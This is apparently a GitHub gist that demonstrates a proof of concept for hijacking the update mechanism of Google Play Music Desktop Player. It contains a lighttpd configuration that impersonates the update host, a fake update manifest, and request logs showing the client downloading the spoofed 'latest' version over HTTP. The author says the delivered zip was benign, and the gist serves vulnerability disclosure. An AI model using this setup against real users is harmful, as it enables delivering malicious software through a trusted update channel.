Last active
September 19, 2017 17:16
-
-
Save chtzvt/cdcf8a9f89b40304d6c9 to your computer and use it in GitHub Desktop.
GPMDP update server spoofing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$HTTP["host"] =~ "update.googleplaymusicdesktopplayer.com" { | |
server.document-root = "/var/www/hosts/gpmdp/" | |
$HTTP["url"] =~ "^/update/osx/"{ | |
server.document-root = "/var/www/hosts/gpmdp/fake.json" | |
} | |
$HTTP["url"] == "/"{ | |
url.redirect-code = 302 | |
url.redirect = ( | |
"" => "https://github.com/MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-/releases/download/3.0.1/Google.Play.Music.Desktop.Player.x86.exe" | |
) | |
} | |
$HTTP["url"] =~ "^/download/version/"{ | |
url.redirect-code = 302 | |
url.redirect = ( | |
"" => "http://update.googleplaymusicdesktopplayer.com/download/Google.Play.Music.Desktop.Player.OSX.zip" | |
) | |
} | |
} | |
# Client behavior when connecting to malicious update server (from lighttpd log): | |
# Poll root directory of update server (we serve a 302 to windows .exe to imitate the real server) | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET / HTTP/1.1" 302 0 "-" "-" | |
# GPMDP loads JSON file from fake update server | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /update/osx/3.0.1 HTTP/1.1" 200 247 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)" | |
# GPMDP parses our fake update file and follows our "evil" link :^) | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /download/version/3.0.7/osx_64?filetype=zip HTTP/1.1" 302 0 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)" | |
# GPMDP downloads the "latest" fake version from our update server! | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:36 -0400] "GET /download/Google.Play.Music.Desktop.Player.OSX.zip HTTP/1.1" 200 50647108 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)" | |
# Contents of fake.json: | |
# { | |
# "url":"http://update.googleplaymusicdesktopplayer.com/download/version/3.0.7/osx_64?filetype=zip", | |
# "name":"3.0.7", | |
# "notes":"This is a fake release of GPMDP that contains malicious content!", | |
# "pub_date":"2016-03-12T02:53:45.000Z" | |
# } | |
# Update file ZIP was just the latest version of GPMDP. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment